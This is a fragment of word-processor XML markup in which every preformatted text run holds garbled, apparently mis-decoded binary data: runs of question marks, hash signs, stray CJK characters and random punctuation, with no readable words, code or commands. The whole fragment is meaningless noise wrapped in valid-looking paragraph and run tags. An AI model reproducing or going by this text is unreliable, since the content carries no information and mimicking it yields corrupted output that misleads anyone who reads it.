        <w:t>o??E?μ8){???#j???Gi`WRT??#???V????oST?C?#l?##?r??????#!#???C\ ## ## ###?#?7}?k?u?ccc1&amp;#i? ??Q??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+???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#????#w?_??d?Ls?)?ia07,7???????dW????#Cx########??uwt?+&lt;?y?]?</w:t>
        <w:br/>
        <w:t>w??#T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>$??Q#Ec$#?#??A??M?6M#:t?m#]??&gt;???I?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#]u?Qj??%qY????%??A##@##z????юu?/&gt;??]SH###z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>K2?E?(#);2#c???]??:??@7m??`?i??m?????q??#*??A??&amp;?######H??Α?;L?kN&gt;??#.\?0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#}?4?1LSW/?P.??g??;-?7??Hy?-?4?y??????h?|?D\ ## ##)#x??????a?#?§=??#c8u?Tq????1$?7??#?0M]K#Ci??#?\?#7,?a?#@d##@##@ y#t???#??M??&gt;1(?u?#&amp;L#XW???#c?|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>M9?1LS???0?,#??&gt;c?J?v?ZA???o?????l??{3Kp##?#?#??t??#/Y?1??#S??5??}?{#????F??F?t?{*?0?="??#Ci</w:t>
        <w:br/>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>靜</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>u??4r?r?L.a}??b&gt;i".#####?#</w:t>
        <w:tab/>
        <w:t>l?{_?)|?;&gt;?e</w:t>
        <w:br/>
        <w:t>#/^?b?{2O?#?);?a??##1??&gt;pF#??SG9?????{???)+#??4###?##?@j#?#?S/#j#?7|??u?'?p#?#&amp;$&lt;?F</w:t>
        <w:tab/>
        <w:t>??d#?0M]##C??L?#4?h;GP??#?#?2?#??h?|?D&lt; ## ##?#?u?g^??c]?&amp;L?#-?u?###?e???Q???#????1???tF?idP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g??)??#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>G?p</w:t>
        <w:tab/>
        <w:t>?KZ4~?H"######??#\1xW?#?/{}?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#6????#?Fi###?4um?J??q??u5??\Cx??#1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y???PN?T?###6??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>冣</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>????!/#?#####?##?@j#?C?_???w?%?.]?Z???##?7J?#?#??+r?##??0###?##?@##v????}?M????O?\?)?9sf#yE&amp;?</w:t>
        <w:tab/>
        <w:t>?o?f??1LSW??##4~#a"*#####??#x???b?#??M?[?V?N?1?4i??w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?o?f?1LSW??##4~#a"*#####??#P#???????#-###j|&gt;?#;#??,#0?i?\y$???#LD## ## ?h#k~p?f3/=??]?p?U??##?O#}?|F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?D??J</w:t>
        <w:tab/>
        <w:t>??#7n## ## #)?????a</w:t>
        <w:br/>
        <w:t>_;??.S8{??HS?d?$???O???#c#?#HI?#??E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 ## P#???#t#b????#G??#c8y?d166VY?p??#?oT#??w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q'A#?_#2"# ## ###</w:t>
        <w:tab/>
        <w:t>?!??#n?#κ?z??Wu???&gt;?e??w?eM#??Q?#?#??</w:t>
        <w:tab/>
        <w:t>?z?##?###Y#######_??.?+D9? ??Q?##?0M]?+?#??y???@##@###E`??=#??5'???p????##[?#?F?#?##?a?? MQ#@?#?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?@E#???H?!?o?????:??#N?:U#&lt;x??#?6?#@?(#%??#??/O? #4~</w:t>
        <w:tab/>
        <w:t>??,?##?##d#?#??u??'??k]?]?@?#</w:t>
        <w:tab/>
        <w:t>?o???0?i?\y$???#LD## ## ?##????c</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鋏</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>}{?#???F?#??O???F???#?ǐo????.?####3f?#???#?##?/@?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E??#???/##?#######.?o?2???p?????#.A#??F????z#a2^?T??q???Y?d?????)?)?~?z1q?D1::?q?+W#???(?#?#?W;?P?_?#C#@##@##@@#?s??#S??#\)???+&lt;?#????KN??#?)???O7?r?N#??c??cS???HNNXy#?#y?u??%B#??#c?$???Z#?h?j?#n</w:t>
        <w:br/>
        <w:t># ## #####??c?+~?6?o??x??O?#??0a?####?#'PU?H?,}$?6"G???4n?p$''?&gt;B?#C}D?i?#?i?!??#???&lt;c?!#?##?##???~???#n#/???i}???`##????4^?14??IIT#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>G?r??#?T?)S??C?#5???#6R6$?J#U5~U?</w:t>
        <w:tab/>
        <w:t>?########???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?vL!}?;&gt;?e</w:t>
        <w:br/>
        <w:t>??0??l?g@l??(XU??h??F#MS5M?</w:t>
        <w:tab/>
        <w:t>U??m????p?9?mdR7????km&lt;cZc(?j[#??#c?#???Z</w:t>
        <w:tab/>
        <w:t>T???I?##@##@?g</w:t>
        <w:tab/>
        <w:t>l?{?a]?3:???3{?#'????U7??????#?F???o$?&gt;#'?W??i2?y?Tc?#VnfCFд??#?#6Q5??R#U4~?f#7#######??#???G;#??9?g??s;L?I???{?,??Ο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E?/_?Nj?[?vm???5??t??e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)?r?#?&gt;?i???p*?#?#?E?</w:t>
        <w:tab/>
        <w:t>?#6[??##@##@?L??#?y???????)?CCC@?A?F#?~?_????#O#?94?4???F??</w:t>
        <w:br/>
        <w:t>u:(w?g????3</w:t>
        <w:tab/>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>i?C2?MZs#c?t?E?|#????V?## ## ##\#??'#???o~?)\?t)7??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>'G#???T???-?H?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>S?T?7??P???#C2??p??KXUW}?L?j#??????s#c-#0??*?tEC???/?L#! ## ##I##?&lt;?a</w:t>
        <w:br/>
        <w:t>???s]?p?YI3?9u?p???#???1L}???~##g#QZ+?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>G??%?,7?h</w:t>
        <w:br/>
        <w:t>??D}??ig#?#?h##G?#?l??#??##?##DA`??_u?+|???gk?</w:t>
        <w:br/>
        <w:t>'O?,???Ho?PG#?q?#?p^O?#V?7?#C}???;*'?Y??pt?KXy/}??~?!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H### Pe?W y?##@##@##?#?#?EW??#-?u??????#-?-??l????#~??#??#!?#&gt;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a??w????&lt;#B?rB???u???pT?????Ч?b?a/?#?{?#|7~IBB?@##@###A????;?????wwM!]?jU#?Rw"G?mm??o&lt;E1??1j#?o???)w%?m?#J3?#?#??#'??Bj:#??f#???]Cq##@ D?# ??##@##@##2</w:t>
        <w:tab/>
        <w:t>????#??s/?2??g?#E&amp;#?hao?#?o?,$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?5?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?? ## ##~</w:t>
        <w:tab/>
        <w:t>????g??0?S?N?B&amp;???B}??m??a??`?#5G+???#??B?$??'eG?A##@ ###?##?^6???9/zy??]?v%??#??H???t??B9Z(????#??8?kR??o???O?#?0M]?re[??#?s??????p#77,7?K???E??$?######??##b???)?/??wtM!###?:i???c??*?q??k#???</w:t>
        <w:tab/>
        <w:t>sHg#?9??KS??o???0?i?i?&lt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???#??L?p?#nXn8?8}</w:t>
        <w:br/>
        <w:t>???'M?## ## P%?+#??0??9??.S?p??*???{=r???[&gt;"???_?#&gt;9?4?QC?#[?3#?#?4um?J?Yi?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>b???Vc???"?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>臊</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>r?????p.q??#??O??##@##@?*##???0?o?????zF??##V????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>硱</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>{??M#Z?ж#?&gt;Z(???QC?#[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?W4?7m?4q?С?I4?#?F?d??0?p?)U??*?|2n!????Bh#####??</w:t>
        <w:tab/>
        <w:t>????C?????#?p?</w:t>
        <w:tab/>
        <w:t>bdd???F????5-T??'???#*l?p???#?o#y?-?&lt;?###???3#C??2?#?m??Co9??8##&gt;?U#4~^q"2#####??##=?x?!?'^?Q??U3???####NI??????0??9,???"#?F)??##?4u??#?#?[??z#??Ic?#???4?yaC?</w:t>
        <w:tab/>
        <w:t>c?#?#?######0#?t?##SH_??#w???#?^##?Et??/y7?d&amp;S??#??"?a?*2r#c?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>i????_????[?]???,?#\P#P#P#???\2?a</w:t>
        <w:br/>
        <w:t>??+??~T?1???#?\r</w:t>
        <w:tab/>
        <w:t>?m???gW\*??o??L?W6?*&gt;w?y??;n??'?4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X??r?a?#QL%-J#?##?##?@x#;G#?0?o???o?{a?)?4i#?#fHA;?~???L!m&lt;C#???##?#?Y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+We?!?FκAi.?a??(C.a}???'M?## ## #???~L?w?#;?a????B:44#??I????#???e</w:t>
        <w:br/>
        <w:t>?(?a??I#?#?Y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rv#????ptsnXn8?8}K???7Q?## ## ???#?W??.S?t?R??M*??}[?v#?????m??C???$??Q?%#?0M]??!#????8q?###?V?c?#??8}???'M?## ## ???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?v?##??L??3}?6??v??{?Mf6?J?&amp;4?t#@?(?R#c?????PN?T?#4M??#p?rù??SV4~&gt;i".######?#6???#???k?1#???p??&gt;o?L\???h</w:t>
        <w:br/>
        <w:t>??6?&lt;??#?F!??#'?a?##K?4\???zsH??GI?i?j???a???#G#?#?/?h?|?D&lt; ## ##&gt;</w:t>
        <w:tab/>
        <w:t>???#???y?/|?q#?|:x?-&gt;o?D\4=????L?)?C??yp(?&lt;??#?F!??#7?a}?q?#@??#??L####?!#????+7w?#N}??]/?W?Z?CTxY??1q??s?;???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>坼</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Hz&lt;#?Fi###?4uE?&lt;#@??#&amp;?######?B??o???#?v?E]?p???^?R$????[&gt;?e</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>黱</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>G#L)?A?QP??E#cX#z?)#??5E)?##@##z?????#S????#?z??u#??'?????#???#??!?&lt;B?mT?#?z#v#e2???7r#??0?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#</w:t>
        <w:br/>
        <w:t>??##????? ## ##?#v??U??Y#\/?`?#c]aNA??#??????G?#E#c#?#HJ?#???#R## ##?F?t????=?k</w:t>
        <w:br/>
        <w:t>???@??????{#?????##?q??*#??#B?j'??v</w:t>
        <w:tab/>
        <w:t>?######?##?#?=w]??#??w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v?0?B#A?8#????J#??A? ??/</w:t>
        <w:br/>
        <w:t>#?#####?i###?a</w:t>
        <w:br/>
        <w:t>??????~F?h??S???#{???&lt;#Ga?y??#?S?@/????LG?#8p@?1C?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>烗</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#^??0??p?]#L??#?#???##?@2#?C?i]??#??k]?]???s?????GiWR|?##?7??~??h??Z?~??n?9????o/Y??#!/??]^O?8q?###?o?????###?aX??=##?#?#? # ## ##?</w:t>
        <w:tab/>
        <w:t>&lt;4v@?z?P?h??_bW?x?u?S???#B?Σ4zH?#??@??#?)u?M5i?9??0????=5?#;v??????&lt;NXy?L??FM?#?#?jb?1??3??`#!#?#?@?A##@##*"@????u????|??#.^???#?}?{###??q^?BZgH?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??G??????q??m??#D?pr??#??1?G#?#?&amp;&amp;#?j8?.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&amp;PU??`DH:#?##?@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</w:t>
        <w:br/>
        <w:t>g?y?8Z[Wx?</w:t>
        <w:tab/>
        <w:t>'`]?#?[?[??G#?A[?U??L?x?&amp;?1?]K?K?)??r??#?T?)S??C?#U???[?#?c??#%PU?(&gt;d##@##@?#????t?·}bP&lt;??/?#-?0a?###)#{:??H?;V#M?Ο/??F????Fe??n?T?z?????#?ǐ#?5????DF&amp;?590?MQ</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鬍</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>@U?_m#?A##@##?"?#b?#????k</w:t>
        <w:br/>
        <w:t>???`T?:1???o[?e</w:t>
        <w:br/>
        <w:t>i:???U'???WU??62h?|???#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??l?#??#6?@?#6Q5??R#U5~?f</w:t>
        <w:br/>
        <w:t>7######????###????c?p?;???#???Q???D=r??7n=??#~??3#v#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?????#??Lk???#i??S3?A9?'G#]?#'?)s4?Tnp#?K??c?#8?"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C#?0#-?#####????#?#?????\??#S??#\)?~F?y?3g?%#???{?;??a?'&lt;?*?F??</w:t>
        <w:br/>
        <w:t>???t?4c?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>顇</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>##?Zs?#?ZH??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>i?C2?\c#^??;?#?3B?#'PE???}####?)#???m?h-??????#???\+&amp;Nzq?h?I???{{???????????#ASK?@</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>輯</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4?y?Q?Uw#?#C}t?t??4{???QI2??#???????9?F%???#?3?#=F t??c8?]####?i#d</w:t>
        <w:br/>
        <w:t>O?xS?#$s?s???h]?K???k</w:t>
        <w:br/>
        <w:t>???P??????6n2s??{?I]##?7????Q5???F??t</w:t>
        <w:tab/>
        <w:t>+?#??P?H?G#?v?!??KiC?$#???I??4#?##?(#?#??M?]K?4??.?A??w|??#??^??ΣCw~?h</w:t>
        <w:br/>
        <w:t>?,?S=?P}#???it./???#v??R?z??.a).?4Q??C?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>橆</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?A?a#B5~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>à?##?##? ???/?????M#?F</w:t>
        <w:tab/>
        <w:t>?o?+?L???K?????P?&amp;z?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?t??Σ4?#?z#??#IS????rG?{d?FGG;~6?I?#vj??)?E???#???XcXO??]A #?#?_??"b#####??#?L??#??</w:t>
        <w:tab/>
        <w:t>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O?,????W?#?F2?m&gt;??##?@?#4??G?w?H???# L???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Q5?m?#9MT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>k??#V??6??#??]I?+??3##!??#?HD</w:t>
        <w:br/>
        <w:t># ## #%#?#???h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E&lt;o??#??Q?b???.??x??C?{?;?#???'?l?#e?B&amp;?????'?B:?#;??$?#}##????#?)??VN#?_??qC####H??j</w:t>
        <w:br/>
        <w:t>?v?7??_???)??</w:t>
        <w:tab/>
        <w:t>&lt;??~_?jU#,\2A???TQ?#?a??y?d???#?c[g?0?u??#A#?_#dB"A##@ *###?ko&amp;??.#G?=;?#??νp?[??S#?????#7???gh##|? ??Q#:?N#??o??/9#h???######??#?Y=?2?o??#??#?l</w:t>
        <w:br/>
        <w:t>???/f]p}?t?t#:vB#%???Σ1??DZ?7?O##)?1?A#q$M#?_??"s ## #?##X??#??\C?????=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c?q??{##</w:t>
        <w:br/>
        <w:t>?#".N#}???b?#?0fu??(#??B#$##@###G`pp?y?P5?K?.m\?]#??Cc?G???N??#?"#?#U#????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k##4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#?##???#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>￥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>~v!?&lt;????t?#?wc?&gt;#??H??#?Fi#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?4u-?+??-?3aL???s?#s?r?#?`?#??/??##@##z?##?2??/L???/v#:?P_S8??#?&lt;?#??7j?H#?#cX#Z????C?YI???FQ7???y???#?p??????znXn8?#???I#q?##?@?#??#?2?d*S????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Mf6?</w:t>
        <w:br/>
        <w:t>;?6Dp?#"?c2?lq#! ?#+W?##'N#???#8?_?z?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##????????p#17,7?OM??????@##@?7#&lt;4v@Lz??2?#&amp;LH#??{#??p?}k??k?#B?(Mu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9W???7#C??F????QGn8??#?#?9?9#???M#?##?@?#?#.??V????]?#Κ5+#P??(?#????Σ?#}??i?I1?!?R#??#???????q?m[??T?Q7x?i???.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?##@##?&amp; M!?a8??.(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^?#??#T??A?#?#CZk?O?#?o?&lt;?8)?1?P?0rt????{?????P??u??uQ1#üp?F1D?&gt;%C??&amp;?####?t</w:t>
        <w:tab/>
        <w:t>??????&gt;1(?q?s</w:t>
        <w:br/>
        <w:t>?CZ?O??hwQ?Σ?+)&gt;?$??Q3u?K5?a#?#?]?#?]?tc#????U??k?</w:t>
        <w:br/>
        <w:t>j?L?/??f?#?Y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#.\?9???#2???9#v2?Oy?SZ???w4????O??\?????/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?_,_qq??jY???????#?1?_?JR?#UA#?GB?v#?T?Jd?M@##@###@@#)????QБ#?GV?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???y]??#+??h#?t^#1b?G????#6S7???&amp;д+??^*? g= ?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>冣</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?p?r?y?s$24~??"&gt;####H???#.[s??:u??)?Y*M?l???MfhGR|? ??Q#:?1LSW?\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O??(???pN?g#F???  ## ?##=?xk?Q}?(????w?????=?6??9sfk?69?H??Yg?-[?4?"?&lt;:t</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>痌</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???.?'##?#????##?4uu?U???SG???PG#??(???pN#r#???I#q?##?@##?#~???M??#??%#???o[?e</w:t>
        <w:br/>
        <w:t>i:)v#MOz???r#c???ι"?Eo.??fLFL?0?=??r?r?9#?#??O??##@##?O??#???##6??#&lt;r??7n=??#~??3#v#MSv???#?0M]#?J=?BNoя??#?????i????a??</w:t>
        <w:br/>
        <w:t>A0\???#I?## ##?'`3??]?C????M?Cc?</w:t>
        <w:br/>
        <w:t>:?P?????</w:t>
        <w:br/>
        <w:t>2???I#}?4u?1LSW??##4~#a"*####h0?,Sx??k</w:t>
        <w:br/>
        <w:t>S7???{?q?????3????.#???#?0M]?+?#??y???@##@??#`</w:t>
        <w:br/>
        <w:t>;?????6n2s??#?0??B#}##Z?</w:t>
        <w:tab/>
        <w:t>#c?#???#??</w:t>
        <w:tab/>
        <w:t>&lt;n## ##?#???O}?6ы#?d?????;??H#C2B#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>徑</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>????J##???#Z##??#???8?&amp;??_??"s ## ? ?e</w:t>
        <w:br/>
        <w:t>???wt#I???Q?#J?DuSH;?????? ?##?7??!??+?_??"??|?a?]?%kn8N?2.y????#?9??c?#?0v????</w:t>
        <w:tab/>
        <w:t>?j?j?#### ## ?I#??I&l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(??B?x?6????#??#?&amp;??#?j?tsh:j?s=7#??</w:t>
        <w:tab/>
        <w:t>+?!?#?Qw???4?d?#6I-??##!#?Z2???##?##?</w:t>
        <w:tab/>
        <w:t>???#N8!?#)??</w:t>
        <w:tab/>
        <w:t>:zB7?tD#v#e#??#V?72?=#I&amp;?6R??2r?q??G#uc??(6Mt#?)??VN????? ## ##F#??p???bll,I?4E????#??ΣIJ??TU}#?(??;?hi$i?'7#]?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?7bHSamG????##?f#p??</w:t>
        <w:tab/>
        <w:t>T???O#)####??</w:t>
        <w:tab/>
        <w:t>?#&gt;??]#?`?df??/????##??J???Q??N?zB5??m?D__??#w??a?#J=?j????#?ǐo?? ?g??lBq?1l?JHc?#?j?j?$n## ##  `</w:t>
        <w:br/>
        <w:t>?,#??#0?B:?###??o$?i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???T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%????#??#6???#6Q5??R#U5~?f</w:t>
        <w:br/>
        <w:t>7######? #S?###</w:t>
        <w:tab/>
        <w:t>?a?</w:t>
        <w:br/>
        <w:t>?Σt?=&gt; @#?/_.?d?[?v?#H?l?S3??^???#?y?\??)s4?Tn?#?G?i;??#z)??$e#0?)????##????#.??????#t#I????##?Σ?#,#U???#????i?!???????tR}?6?i?C#CV?G?^&amp;PE???|?w####???c??V??p?8??#?f</w:t>
        <w:br/>
        <w:t>i???|?k???#{??:%?#$#?o$M?i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]!7#?u</w:t>
        <w:tab/>
        <w:t>???^?IT? ????/FGG#T?;I0???</w:t>
        <w:tab/>
        <w:t>???@??μ?? ## ??#?#?#?uS??/v#:?P?ytp?#?y??+HF?C??h???a?6??$qv#%C?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#??D#M?????#6?LC#CTx#?!#??#|#####?z#????'????z##??&lt;8d?df?#???h@?M?:T?Hn6c3??#?(??1T?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>熣</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>x]?Rx?4Q??C?#6??#? ?##??#4#?##?@=#l??_?M????w?)L?#n?o??#????@#?#}#i</w:t>
        <w:br/>
        <w:t>?#8[#L#???r??}?????S`??#?#####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 ##?!#S??Σ4"?O#???i####?#?o$?e?# L???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">?TQ5?n?(#?p?2??QMip?+i^)?? ?@#?#?#"@?A##@ </w:t>
        <w:tab/>
        <w:t>#0???f??#??#???I?L?'??Qx?u?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6?##?F??##???@?)???~?'?????y##?##?|P?/##??4A?"#??/2A?#####p$?e</w:t>
        <w:br/>
        <w:t>/???0?4#h?y???</w:t>
        <w:br/>
        <w:t>:?###p!???#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>愅</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1l?VHiM#???##?#######`</w:t>
        <w:br/>
        <w:t>????[#?#???c#v#?P?z1</w:t>
        <w:br/>
        <w:t>??T#?0M]?+?#??y???@##@?B#??p?</w:t>
        <w:tab/>
        <w:t>b?]#?0????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>緍</w:t>
      </w:r>
